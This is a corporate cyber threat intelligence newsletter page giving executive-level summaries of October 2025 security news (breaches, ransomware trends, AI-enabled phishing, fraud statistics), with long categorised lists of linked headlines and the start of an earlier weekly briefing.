New research of UK finance leaders finds 99% experienced payments‑related cyber incidents in the past two years and 94% plan to raise cyber spend, with over half preparing a significant uplift. Accounts Payable automation is the top priority, yet 47% cite integration with existing systems as the main barrier and only 64% feel confident they have real‑time oversight. The findings underline the exposure created by legacy platforms and fragmented processes and the need for tighter controls, better visibility and stronger governance across finance operations.

Source: https://www.businesswire.com/news/home/20251008745273/en/Cybersecurity-Tops-CFOs-Risk-Agenda-With-99-Reporting-Incidents-and-94-Planning-to-Increase-Spend

SonicWall Cloud Backup Breach Exposes Firewall Configurations

SonicWall confirmed that an attacker accessed firewall configuration backup files for all customers who used its cloud backup service. While credentials in the files are encrypted, possession of configurations raises the risk of targeted exploitation. SonicWall, working with Mandiant, issued remediation guidance including comprehensive credential resets and prioritisation of internet‑facing devices.

Source: https://cyberscoop.com/sonicwall-customer-firewall-configurations-exposed/

Budgets and Skills Lag Behind Rising Attacks

ISACA’s latest survey reports 39% of European organisations are facing more attacks than a year ago, while only 38% are completely confident in detection and response. Despite incremental improvements, 58% remain understaffed and 54% say budgets are still insufficient. Stress and burnout persist, with 68% saying the job is more stressful than five years ago and 22% of organisations taking no action to address it. The data points to structural capability gaps that leadership must close to improve resilience.

Source: https://www.itsecurityguru.org/2025/10/08/research-finds-budgets-staffing-and-skills-fail-to-keep-pace-with-rising-cyber-threats/

SMBs Remain Exposed to AI‑Driven Threats and Ransomware Complacency

A new report highlights how AI is supercharging social engineering and malware while a complacency gap persists in smaller firms. Automated, highly personalised campaigns are raising the success rate of phishing and voice scams, and the financial fallout now stretches far beyond the ransom to business‑ending costs. The analysis argues that many SMBs still underestimate their exposure and need proactive, specialised security and clearer accountability for risk.

Source: https://betanews.com/2025/10/09/smbs-vulnerable-to-ai-powered-cyberattacks-and-complacent-about-ransomware/

Digital Fraud Now Costs Firms an Average 7.7% of Revenue

TransUnion’s H2 2025 update estimates global businesses lost $534bn over the past year to digital fraud, with US firms averaging 9.8% of revenue. Account takeover has surged and is now the top driver of losses in the US at 31%, with smishing, phishing and vishing widespread. The findings reinforce the need for stronger identity assurance, layered controls and active monitoring of customer interactions across channels.

Source: https://www.infosecurity-magazine.com/news/digital-fraud-costs-companies/

Survey Finds Attacks Hit 91% of UK Universities and 43% of Businesses

A recent UK survey reveals that 91% of universities and 43% of businesses experienced cyberattacks in the past year, affecting over 600,000 businesses and 61,000 charities. The findings highlight widespread vulnerabilities across sectors, with education institutions particularly exposed due to legacy systems and limited cyber budgets. Despite the scale of attacks, many organisations remain underprepared, lacking robust incident response plans and adequate cyber insurance. Experts warn that complacency and outdated security practices are leaving critical data and operations at risk, urging leadership to prioritise cyber resilience and invest in modern defences.

Source: https://www.tomshardware.com/tech-industry/cyber-security/cyberattacks-hit-91-percent-of-universities-and-43-percent-of-businesses-in-last-12-months-in-the-uk-survey-suggests-more-than-600-000-businesses-61-000-charities-affected

Insurer Forecasts 40% Rise in Named Ransomware Victims by 2026

QBE warns leak‑site victims could exceed 7,000 by 2026, a 40% jump on 2024, with criminals exploiting cloud platforms and AI. Between 2023 and 2025 the UK accounted for 10% of significant incidents. Deepfakes featured in nearly 10% of cases in 2024 with wide‑ranging losses. The report stresses supply chain dependencies and the need for stronger oversight of third parties and recovery planning.

Source: https://www.reinsurancene.ws/ransomware-attacks-to-surge-40-by-2026-amid-ai-and-cloud-vulnerabilities-qbe/

Paying Ransoms Increasingly Fails to Restore Data

A Veeam study finds only 32% of organisations that paid ransoms in 2024 recovered their data, down from 54% in 2023. 63% lack alternative infrastructure for site‑wide recovery. The report highlights data theft‑only tactics and the case for tested backups, segmented recovery and rehearsed decision‑making.

Source: https://www.techradar.com/pro/security/many-businesses-paying-a-ransomware-demand-dont-get-their-data-back

SaaS Incidents Surge Despite High Confidence

AppOmni’s 2025 study shows 75% of organisations suffered a SaaS incident in the past year while 91% felt confident in their posture. Incidents are often driven by permissions issues and misconfigurations, and accountability is fragmented across business units. The report calls for continuous oversight and independent validation of SaaS controls.

Source: https://securityboulevard.com/2025/10/75-of-orgs-had-a-saas-security-incident-despite-high-confidence-in-their-security-heres-why/

AI Supercharges Phishing and Stretches Defences

A Comcast report analysed 34.6 billion events, showing attackers scale noisy campaigns while running quiet intrusions in parallel. Generative AI makes it easier to craft realistic phishing attempts and malware, while shadow AI and non‑human identities widen exposure. Human fatigue and proxy abuse further erode traditional detection methods, strengthening the case for layered, behaviour‑based controls.

Source: https://www.helpnetsecurity.com/2025/10/06/phishing-ai-enterprise-resilience-security/

Deepfake Voice Risks Highlight Identity Verification Gaps

Microsoft halted its Speak for Me voice cloning test after concerns it could enable fraud through highly convincing impersonations. This highlights the dangers of implementing voice cloning without strong security and verification controls.

Source: https://www.darkreading.com/application-security/microsoft-voice-clone-scary-unsalvageable

Insurers and Asset Managers Expand Cybersecurity Oversight

Moody’s survey of 102 insurers and asset managers shows cyber security remains a top board-level priority. Budgets are rising, firms plan to hire specialists, and advanced defence strategies are being adopted. Oversight is strengthening, with 40% now linking CEO pay to cyber performance goals, up from 24% in 2023. Regional gaps persist in third-party risk management, AI governance, and cyber insurance coverage. Most respondents maintain vendor risk programmes, and over 80% have AI policies. Cyber insurance adoption is highest in the Americas, and 21% plan to increase coverage limits in 2025.

Source: https://www.reinsurancene.ws/insurers-and-asset-managers-strengthen-cybersecurity-oversight-and-expand-budgets-moodys/

Threats

Ransomware, Extortion and Destructive Attacks

Paying ransoms fails to guarantee recovery as cyber criminals demand more while firms burn cash and struggle with rising losses | TechRadar

Many businesses paying a ransomware demand don't get their data back | TechRadar

Ransomware Group “Trinity of Chaos” Launches Data Leak Site - Infosecurity Magazine

'Cops and robbers': Top 5 ransomware groups behind nearly half of all attacks | Insurance Business America

Ransomware attacks to surge 40% by 2026 amid AI and cloud vulnerabilities: QBE - Reinsurance News

29% of businesses that paid cyber attack ransoms still had their data leaked

Active Ransomware Groups Reach an All-Time High, GuidePoint Security Finds

SMBs vulnerable to AI-powered cyberattacks and complacent about ransomware - BetaNews

Hackers launch data leak site to extort 39 victims, or Salesforce - Help Net Security

Salesloft hackers outsourcing ransom negotiations for $10 • The Register

LockBit, Qilin, and DragonForce Join Forces to Dominate the Ransomware Ecosystem

Ransomware Attacks Skyrocket, Forcing Companies to Confront a Vexing Question | Law.com

Cybersecurity Needs A Supply Chain Perspective: JLR attack Shows Why

Google says 'likely over 100' affected by Oracle-linked hacking campaign | Reuters

BBC journalist lured with promises of millions in ransom before hackers unleashed chaotic phone attacks in chilling twist | TechRadar

Oracle links Clop extortion attacks to July 2025 vulnerabilities

Oracle tells Clop-targeted EBS users to apply July patch • The Register

Microsoft: Critical GoAnywhere bug exploited in ransomware attacks

Red Hat data breach escalates as ShinyHunters joins extortion

Hackers claim to have stolen over a billion Salesforce records - and are demanding nearly $1 billion not to leak them | TechRadar

Salesforce refuses to pay ransom over widespread data theft attacks

Inside the 'Trinity of Chaos' group of young hackers targeting major companies - ABC News

Ransomware Gangs Leverage Remote Access Tools to Gain Persistence and Evade Defenses

XWorm malware resurfaces with ransomware module, over 35 plugins

Teens arrested in London preschool ransomware attack • The Register

Chaos Ransomware Upgrades With Aggressive New Variant

Hackers now use Velociraptor DFIR tool in ransomware attacks

Ransomware Victims

Hackers hold 1 billion customer records to ransom | The Independent

The cost of cyber hacking on UK business is greater than it seems - BBC News

Salesforce refuses to pay ransomware crims' extortion demand • The Register

Jaguar Land Rover Shows Cyberattacks Mean Business

Japan’s Asahi ships beer manually after ransomware attack | The Straits Times

Jaguar Land Rover expected to restart some production after cyber-attack - BBC News

The Guardian view on the Jaguar Land Rover cyber-attack: ministers must pay more attention to this growing risk | Editorial | The Guardian

Aston Martin warns of disruption in wake of JLR cyber attack

JLR counts cost of cyber hack with UK retail sales down 32% | Manufacturer News

Co-op set to reveal financial toll caused by cyberattack | The Independent

Teens arrested in London preschool ransomware attack • The Register

Phishing & Email Based Attacks

Yubico survey exposes cybersecurity gap as organizations lag on training while phishing scams evolve faster than most defenses can adapt | TechRadar

SpamGPT - When Phishing Gets a Marketing Degree - Security Boulevard

Phishing Is Only the Tip of Cybersecurity’s AI Arms Race | MSSP Alert

Phishing is old, but AI just gave it new life - Help Net Security

New ‘point-and-click’ phishing kit simplifies malicious attachment creation | SC Media

How Phishing Kits Are Evading Detection & Ways to Beat Them | MSSP Alert

APT Hackers Exploit ChatGPT to Create Sophisticated Malware and Phishing Emails

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Why Brand Impersonation Is A Marketing Crisis, Not Just A Cybersecurity Problem

Hackers Exploit WordPress Sites to Power Next-Gen ClickFix Phishing Attacks

Other Social Engineering

North Korean agents pretending to be IT guys have funneled up to $1 billion into Kim Jong Un's nuclear program | Fortune

North Korean hackers stealing record sums, researchers say - BBC News

New FileFix attack uses cache smuggling to evade security software

Microsoft Warns of Hackers Abusing Teams Features and Capabilities to Deliver Malware

BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers

Fraud, Scams and Financial Crime

Digital Fraud Costs Companies Worldwide 7.7% of Annual Revenue - Infosecurity Magazine

More than a third of Brits would give up online shopping over fears of identity theft - InternetRetailing

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

Former Tory council leader on trial over alleged romance fraud - BBC News

Risks of cyber fraud allegations remain high for companies subject to government requirements - Nextgov/FCW

Artificial Intelligence

SMBs vulnerable to AI-powered cyberattacks and complacent about ransomware - BetaNews

SpamGPT - When Phishing Gets a Marketing Degree - Security Boulevard

Phishing Is Only the Tip of Cybersecurity’s AI Arms Race | MSSP Alert

Phishing is old, but AI just gave it new life - Help Net Security

APT Hackers Exploit ChatGPT to Create Sophisticated Malware and Phishing Emails

Ransomware attacks to surge 40% by 2026 amid AI and cloud vulnerabilities: QBE - Reinsurance News

Microsoft's Voice Clone Becomes Scary & Unsalvageable

FraudGPT and WormGPT, are now available on dark net forums for as low as $100 - The420.in

AI is making cybercriminal workflows more efficient too, OpenAI finds | ZDNET

Two-thirds of bank staff using unapproved AI tools - survey

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Cybersecurity’s next test: AI, quantum, and geopolitics - Help Net Security

Employees regularly paste company secrets into ChatGPT • The Register

How Your AI Chatbot Can Become a Backdoor | Trend Micro (US)

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

What CISOs should know about DeepSeek cybersecurity risks | TechTarget

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

Take Note: Cyber-Risks With AI Notetakers

CometJacking: One Click Can Turn Perplexity's Comet AI Browser Into a Data Thief

ICO’s £7.5m Clearview AI Fine a Step Closer After Legal Victory - Infosecurity Magazine

Malware

APT Hackers Exploit ChatGPT to Create Sophisticated Malware and Phishing Emails

Sophisticated Malware Deployed in Oracle EBS Zero-Day Attacks - SecurityWeek

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

New FileFix attack uses cache smuggling to evade security software

Microsoft Warns of Hackers Abusing Teams Features and Capabilities to Deliver Malware

Hackers Exploit RMM Tools to Deploy Malware - InfoRiskToday

From infostealer to full RAT: dissecting the PureRAT attack chain

BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers

XWorm malware resurfaces with ransomware module, over 35 plugins

Detour Dog Caught Running DNS-Powered Malware Factory for Strela Stealer

New "Cavalry Werewolf" Attack Hits Russian Agencies with FoalShell and StallionRAT

Self-Propagating Malware Hits WhatsApp Users in Brazil

Bots/Botnets

RondoDox botnet fires 'exploit shotgun' at edge devices • The Register

The architecture of lies: Bot farms are running the disinformation war - Help Net Security

Mobile

Google Pixel October security patch continues to fix haunting display problems | Android Central

New ClayRat Spyware Targets Android Users via Fake WhatsApp and TikTok Apps

Android spyware pretends to be Signal or ToTok update to fool victims - here's how to stay safe | TechRadar

Self-Propagating Malware Hits WhatsApp Users in Brazil

Denial of Service/DoS/DDoS

Critical networks face unprecedented threat as DDoS attacks are getting shorter and more intense | IT Pro

Telco biz ICUK restores services after two-day DDoS pelting • The Register

Internet of Things – IoT

Connected devices in the workplace: innovation or a gateway for cyberattacks?

Building owners face up to growing cyber threat

How to protect your car from hacking | Kaspersky official blog

Data Breaches/Leaks

Red Hat Breach Exposes 5000+ High Profile Enterprise Customers at Risk

SonicWall admits attacker accessed all customer firewall configurations stored on cloud portal | CyberScoop

Google says 'likely over 100' affected by Oracle-linked hacking campaign | Reuters

CL0P-Linked Hackers Breach Dozens of Organizations Through Oracle Software Flaw

Hackers claim to have stolen over a billion Salesforce records - and are demanding nearly $1 billion not to leak them | TechRadar

Discord discloses data breach after hackers steal support tickets

Hackers claim Discord breach exposed data of 5.5 million users

Renault warns UK customers after cyberattack exposes data

Military radio maker BK Technologies cops to cyber break-in • The Register

Electronics giant Avnet confirms breach, says stolen data unreadable

Dutch travel company refuses compensation after cyberattack exposes customer data | NL Times

Data Breach at Doctors Imaging Group Impacts 171,000 People - SecurityWeek

Huawei Under Fire Again: Alleged Data Breach and Espionage Claims Stir Controversy - Cybersecurity Insiders

Sunweb confirms data breach, warns customers to be on their guard | TechRadar

DraftKings warns of account breaches in credential stuffing attacks

Boyd Gaming sued by employee over data breach​ | Cybernews

Organised Crime & Criminal Actors

Europol Calls for Stronger Data Laws to Combat Cybercrime - Infosecurity Magazine

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

North Korean hackers stole $2 billion in crypto this year: report - UPI.com

Kremlin-backed crypto coin moves $6bn despite US sanctions

Politics Home Article | UK Faces Diplomatic Battle Over £5.5bn Bitcoin Claim

Insider Risk and Insider Threats

North Korean agents pretending to be IT guys have funneled up to $1 billion into Kim Jong Un's nuclear program | Fortune

Employees regularly paste company secrets into ChatGPT • The Register

BBC journalist lured with promises of millions in ransom before hackers unleashed chaotic phone attacks in chilling twist | TechRadar

Insurance

Cyber cover concerns remain for risk managers – FERMA

Cyber insurance should complement, not replace, cybersecurity: FERMA - Reinsurance News

Impacts of Cyber Threat Landscape on Insurers and Policyholders | Gray Reed - JDSupra

Why cyber-security insurance matters for charities | Third Sector

Supply Chain and Third Parties

75% of Orgs. Had a SaaS Security Incident Despite High Confidence in Their Security. Here’s Why. - Security Boulevard

Cybersecurity Needs A Supply Chain Perspective: JLR attack Shows Why

Nearly a third of bosses report increase in cyber-attacks on their supply chains | Business | The Guardian

The cost of cyber hacking on UK business is greater than it seems - BBC News

Discord says sensitive info stolen during cyberattack on customer service provider | The Record from Recorded Future News

Cyber-Attack Contributes to Huge Sales Drop at JLR - Infosecurity Magazine

Cloud/SaaS

Nearly a third of bosses report increase in cyber-attacks on their supply chains | Business | The Guardian

Ransomware attacks to surge 40% by 2026 amid AI and cloud vulnerabilities: QBE - Reinsurance News

Hackers claim Discord breach exposed data of 5.5 million users

Discord Says 70,000 Users Had IDs Exposed in Recent Data Breach - SecurityWeek

Microsoft Warns of Hackers Abusing Teams Features and Capabilities to Deliver Malware

Microsoft 365 outage blocks access to Teams, Exchange Online

Outages

Microsoft 365 outage blocks access to Teams, Exchange Online

Azure outage blocks access to Microsoft 365 services, admin portals

Encryption

Cybersecurity’s next test: AI, quantum, and geopolitics - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

Massive surge in scans targeting Palo Alto Networks login portals

DraftKings warns of account breaches in credential stuffing attacks

Social Media

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

LinkedIn sues ProAPIs for using 1M fake accounts to scrape user data

Malvertising

Brazilian scammers, raking in millions, used Gisele Bundchen deepfakes on Instagram ads | Reuters

Regulations, Fines and Legislation

Europol Calls for Stronger Data Laws to Combat Cybercrime - Infosecurity Magazine

Invite us to your cyber war games, Finra urges members - Risk.net

German government says it will oppose EU mass-scanning proposal | CyberScoop

ICO’s £7.5m Clearview AI Fine a Step Closer After Legal Victory - Infosecurity Magazine

Federal judiciary touts cybersecurity work in wake of latest major breach | CyberScoop

State Cyber Teams Brace for Impact of US Government Shutdown

Federal shutdown deals blow to already hobbled cybersecurity agency

UK government says digital ID won't be compulsory – honest • The Register

Careers, Working in Cyber and Information Security

Research Finds Budgets, Staffing and Skills Fail to Keep Pace with Rising Cyber Threats - IT Security Guru

How to succeed at cybersecurity job interviews - Help Net Security

Law Enforcement Action and Take Downs

Teens arrested in London preschool ransomware attack • The Register

Arrests Underscore Fears of Teen Cyberespionage Recruitment

Politics Home Article | UK Faces Diplomatic Battle Over £5.5bn Bitcoin Claim

Former Tory council leader on trial over alleged romance fraud - BBC News

Misinformation, Disinformation and Propaganda

The architecture of lies: Bot farms are running the disinformation war - Help Net Security

Lessons in Resilience: Moldova’s Response to Russia’s Hybrid Interference | German Marshall Fund of the United States


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

China Is Joining Russia’s Shadow War on Europe - Bloomberg

Russia: already at war with Europe? | The Week

“We are already in the middle of a cyber war” - NATO expert warns - 08.10.2025 | BURSA.RO

Russia waging ‘grey-zone campaign’ and Europe must meet challenge, says EU chief

Nation State Actors

Cybersecurity’s next test: AI, quantum, and geopolitics - Help Net Security

China

China Is Joining Russia’s Shadow War on Europe - Bloomberg

Security Firm Exposes Role of Beijing Research Institute in China's Cyber Operations - SecurityWeek

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

China-linked hacking fears over Cisco devices in offices

PRC Gov't Fronts Trick the West to Obtain Cyber Tech

What CISOs should know about DeepSeek cybersecurity risks | TechTarget

Law firm representing big-name politicians hit with major hack from China: report - Raw Story

Chinese Cybercrime Group Runs Global SEO Fraud Ring Using Compromised IIS Servers

Most telcos have been hit by Salt Typhoon-style attacks

Huawei Under Fire Again: Alleged Data Breach and Espionage Claims Stir Controversy - Cybersecurity Insiders

No 10 denies government involved in collapse of China spying case - BBC News

Russia

Russia: already at war with Europe? | The Week

“We are already in the middle of a cyber war” - NATO expert warns - 08.10.2025 | BURSA.RO

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks

Russia waging ‘grey-zone campaign’ and Europe must meet challenge, says EU chief

From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Lessons in Resilience: Moldova’s Response to Russia’s Hybrid Interference | German Marshall Fund of the United States

China Is Joining Russia’s Shadow War on Europe - Bloomberg

Arrests Underscore Fears of Teen Cyberespionage Recruitment

Kremlin-backed crypto coin moves $6bn despite US sanctions

Cooper’s £4m plan to turn tables on Russian hackers

New "Cavalry Werewolf" Attack Hits Russian Agencies with FoalShell and StallionRAT

North Korea

North Korean hackers stole $2 billion in crypto this year: report - UPI.com

North Korean agents pretending to be IT guys have funneled up to $1 billion into Kim Jong Un's nuclear program | Fortune

OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks


Tools and Controls

Insurers and asset managers strengthen cybersecurity oversight and expand budgets: Moody’s - Reinsurance News

Cyber cover concerns remain for risk managers – FERMA

Cyber insurance should complement, not replace, cybersecurity: FERMA - Reinsurance News

SonicWall admits attacker accessed all customer firewall configurations stored on cloud portal | CyberScoop

Research Finds Budgets, Staffing and Skills Fail to Keep Pace with Rising Cyber Threats - IT Security Guru

Invite us to your cyber war games, Finra urges members - Risk.net

GreyNoise detects 500% surge in scans targeting Palo Alto Networks portals

Hackers Exploit RMM Tools to Deploy Malware - InfoRiskToday

Why Brand Impersonation Is A Marketing Crisis, Not Just A Cybersecurity Problem

Cybersecurity Tops CFO’s Risk Agenda With 99% Reporting Incidents and 94% Planning to Increase Spend

Six metrics policymakers need to track cyber resilience - Help Net Security

NCSC: Observability and Threat Hunting Must Improve - Infosecurity Magazine

Hundreds of free VPNs offer 'no real privacy at all,' researchers warn - does yours? | ZDNET

Are VPNs Under Attack? An Anti-Censorship Group Speaks Out - CNET

How CISOs can get out of security debt and why it matters | TechTarget

Ransomware Gangs Leverage Remote Access Tools to Gain Persistence and Evade Defenses

Take Note: Cyber-Risks With AI Notetakers

Edge device security: The frontline of your network - Security Boulevard

Google's New AI Doesn't Just Find Vulnerabilities — It Rewrites Code to Patch Them

Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.


Black Arrow Cyber Threat Intelligence Briefing 03 October 2025

Black Arrow Cyber Threat Intelligence Briefing 03 October 2025:

-IT Provider Probed as Possible Entry Point in JLR and M&S Breaches

-Security Leaders See Attacks Growing in Frequency and Impact

-Expert Says Basic Security Lapses Still Drive High Profile Breaches

-Russian Vessel Suspected of Mapping Europe’s Undersea Cables

-Hiscox: 80% Of Victims Paid Ransoms and Many Faced Extra Demands

-Allianz: Ransomware Still Drives Large Claims as Criminals Focus on Data Theft

-How Criminals Use AI To Supercharge Phishing and Scams

-Proofpoint: Phishing Remains the Leading Breach Path as AI Raises the Stakes

-ENISA: Phishing Dominated EU Intrusions Over the Past Year

-Phishing Is Shifting to Mobile Channels and Security Must Follow

-Survey Finds Most Workers Cannot Spot AI-Written Phishing Emails

-Researchers Demonstrate Real-Time Voice Cloning for Vishing Attacks

-Okta Warns of North Korean Fake IT Workers Targeting More Sectors

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

We report this week how organisations are attacked through their IT provider, highlighting that business leaders need to understand their third-party and outsourcing risks. Business leaders are seeing various attacks growing in frequency and impact; the solutions are relatively simple, but they require leadership to take ownership of security and to prepare for how an incident will be managed.

We see several stories this week about phishing, which is still a favourite attack route and is made more impactful through AI. We also include a report on organisations that pay ransoms and how this leads to further demands from the attackers.

Our message remains constant and clear: to be more secure and resilient against attacks, business leaders need to upskill on cyber fundamentals and govern cyber risks in the same way as other business risks, by working with control providers across technology, operations and people. In our view, the risks grow when cyber security is treated as an operational IT topic. Contact us to find out the key risks and how to improve security and resilience in a pragmatic and proportionate manner.


Top Cyber Stories of the Last Week

IT Provider Probed as Possible Entry Point in JLR and M&S Breaches

A report explores whether IT helpdesks run by a major outsourcer became an easy route for attackers during recent UK retail and automotive incidents. Politicians have requested clarity on the outsourcer’s role, and prior NCSC guidance warned that password reset teams are prime targets. The piece underlines the importance of boards correctly understanding their third-party and outsourcing risks.

Source: https://www.telegraph.co.uk/business/2025/09/26/suspected-weak-link-in-jaguar-land-rover-ms-hacks/

Security Leaders See Attacks Growing in Frequency and Impact

A survey highlights that executives report more frequent attacks and bigger consequences year on year. Many fear nation state activity will expand beyond government into commercial sectors, while AI is seen as both an accelerator for attackers and a tool for defenders. The findings point to greater attention on supply chain security, incident reporting to executives, and the need for leaders to ensure they can correctly respond to an incident.

Source: https://www.helpnetsecurity.com/2025/09/29/cyberattacks-frequency-impact-growth/

Expert Says Basic Security Lapses Still Drive High Profile Breaches

Recent attacks on well known brands highlight that simple mistakes remain common. The analysis stresses credential hygiene, stronger authentication and supplier dependency management, noting how outages ripple through manufacturing ecosystems and put smaller partners at risk.

Source: https://www.rte.ie/news/business/2025/0930/1536021-cyber-security-data/

Russian Vessel Suspected of Mapping Europe’s Undersea Cables

Satellite data revealed a Russian ship operating near critical energy and telecoms cables in European waters. Experts warn this activity aligns with Moscow’s strategy to prepare covert disruption options in case of conflict. The vessel can intercept communications and potentially plant explosives, raising concerns about the resilience of subsea infrastructure vital to energy and data flows.

Source: https://kyivindependent.com/investigation-finds-russian-sabotage-ship-near-european-undersea-cables-ft-reports/

Hiscox: 80% Of Victims Paid Ransoms and Many Faced Extra Demands

An insurer’s study finds most SME victims that paid ransoms did not fully recover their data, and a sizeable share received follow-on demands. The wider dataset shows more firms reporting attacks and citing AI exposure, underlining the business case for recovery readiness and governance over whether to pay ransoms.

Source: https://news.sky.com/story/cyber-attacks-80-of-ransomware-victims-pay-up-insurer-says-13441131

Allianz: Ransomware Still Drives Large Claims as Criminals Focus on Data Theft

In H1 2025 ransomware represented about 60% of €1m-plus claims. Attackers increasingly exfiltrate data to force payment, and SMEs are being hit harder while large firms’ resilience improves. Social engineering and compromised credentials remain common entry points.

Source: https://www.helpnetsecurity.com/2025/10/01/insurance-claims-ransomware-h1-2025/

How Criminals Use AI To Supercharge Phishing and Scams

Threat actors use generative AI to clone voices and faces, craft believable messages, and spin up fraudulent websites at speed. The post outlines how romance and investment scams are scaled by chatbots, and why cross channel verification and layered controls are needed to counter deepfakes and synthetic identities.

Source: https://www.kaspersky.co.uk/blog/ai-phishing-and-scams/29518/

Proofpoint: Phishing Remains the Leading Breach Path as AI Raises the Stakes

At its annual event, Proofpoint highlighted email as the dominant route to compromise and detailed how AI is being used by both attackers and defenders. The firm shared telemetry on scanning billions of messages and noted widespread risky user behaviour, reinforcing the need for controls that assume fallible humans.

Source: https://www.techrepublic.com/article/news-proofpoint-conference-ai-email-security-phishing/

ENISA: Phishing Dominated EU Intrusions Over the Past Year

An assessment by the European Union Agency for Cybersecurity (ENISA) finds phishing accounted for 60% of observed initial access, ahead of vulnerability exploitation. DDoS featured in a high number of incidents, and hacktivists were using social media and other routes to promote their activity. The report stresses the interdependency risks in European supply chains and the growing use of AI to scale social engineering.

Source: https://www.infosecurity-magazine.com/news/phishing-dominates-euwide/

Phishing Is Shifting to Mobile Channels and Security Must Follow

Analysis argues attackers increasingly bypass email to reach users via SMS, voice and QR codes, often evading enterprise controls. Organisations are urged to extend protection to mobile and collaboration apps and to focus on human layer detection and response.

Source: https://www.darkreading.com/cyber-risk/phishing-moving-email-mobile-is-your-security

Survey Finds Most Workers Cannot Spot AI-Written Phishing Emails

Research shows 54% of respondents failed to identify phishing emails crafted by AI, with younger staff most vulnerable. Nearly 40% have never received cyber security training, and MFA adoption remains below 50%. The findings underline the urgency for awareness programmes and layered defences as AI makes social engineering harder to detect.

Source: https://www.techradar.com/pro/security/most-people-still-cant-identify-a-phishing-attack-written-by-ai-and-thats-a-huge-problem-survey-warns

Researchers Demonstrate Real-Time Voice Cloning for Vishing Attacks

Security experts successfully used AI to clone voices in real time during simulated attacks, convincing targets to perform sensitive actions such as password resets. The technique bypasses traditional safeguards and exploits trust in familiar caller IDs. Businesses are urged to strengthen verification processes for voice-based requests.

Source: https://www.technewsworld.com/story/researchers-mount-vishing-attacks-with-real-time-voice-cloning-179945.html

Okta Warns of North Korean Fake IT Workers Targeting More Sectors

Okta’s research tracks thousands of fraudulent job interviews by DPRK-linked actors posing as remote developers. Targets now include healthcare, finance and AI companies, not just big tech. The activity aims to generate revenue and enable access for further abuses, reinforcing the need for stronger hiring verification and endpoint controls.

Source: https://www.theregister.com/2025/09/30/north_korean_it_workers_okta/



Threats

Ransomware, Extortion and Destructive Attacks

High profile cyber attacks often down to basic errors

New LockBit Ransomware Variant Emerges as Most Dangerous Yet - Infosecurity Magazine

Akira ransomware: From SonicWall VPN login to encryption in under four hours - Help Net Security

Scattered Spider, ShinyHunters Restructure - New Attacks Underway

Cyber attacks: '80%' of ransomware victims pay up, insurer says | Money News | Sky News

Ransomware remains the leading cause of costly cyber claims - Help Net Security

Organisations struggle to recognise lingering effects of ransomware - TechCentral.ie

Third of cyber security professionals feel guilt over ransomware attacks - TechCentral.ie

Ransomware gang sought BBC reporter’s help in hacking media giant

Attackers Use AI to Build Ransomware at Rapid Scale

Google Sheds Light on ShinyHunters' Salesforce Tactics

Why The US Just Put An $11M Dollar Bounty On This Ukrainian Hacker

Ransomware is becoming a psy-ops assault on healthcare executives | SC Media

Ransomware Victims

The suspected weak link in the Jaguar Land Rover and M&S hacks

UK giants hit by cyberattacks: how Co-op, M&S, JLR disruption expose vulnerabilities | Invezz

UK Has Suffered at Least 26 Major Cyberattacks in Last Five Years – Guido Fawkes

Jaguar Land Rover rescued with £1.5bn government-backed loan after crippling cyber attack | UK News | Sky News

Over three-quarters of West Midlands firms feel impact of JLR cyber-attack - The Stratford Observer

Tata Motors shares slip 1% as Moody’s downgrades outlook after JLR cyber incident - The Economic Times

Red Hat confirms security incident after hackers claim GitHub breach

Japan's beer giant Asahi Group cannot resume production after cyberattack | Reuters

Hackers say they have deleted children's pictures and data after nursery attack backlash - BBC News

Google warns of Cl0p extortion campaign against Oracle E-Business users

Data breach at dealership software provider impacts 766k clients

Hackers claim theft of Boeing supplier documents | Cybernews

Phishing & Email Based Attacks

Phishing Is Moving to Mobile. Is Your Security?

UK IT Leaders Warn That Email Is the Front Door for Cyber Risk - and It’s Still Wide Open

How scammers have mastered AI: deepfakes, fake websites, and phishing emails | Kaspersky official blog

Proofpoint Exec: 'Phishing is the Leading Cause of Breaches Globally'

How attackers poison AI tools and defenses - Help Net Security

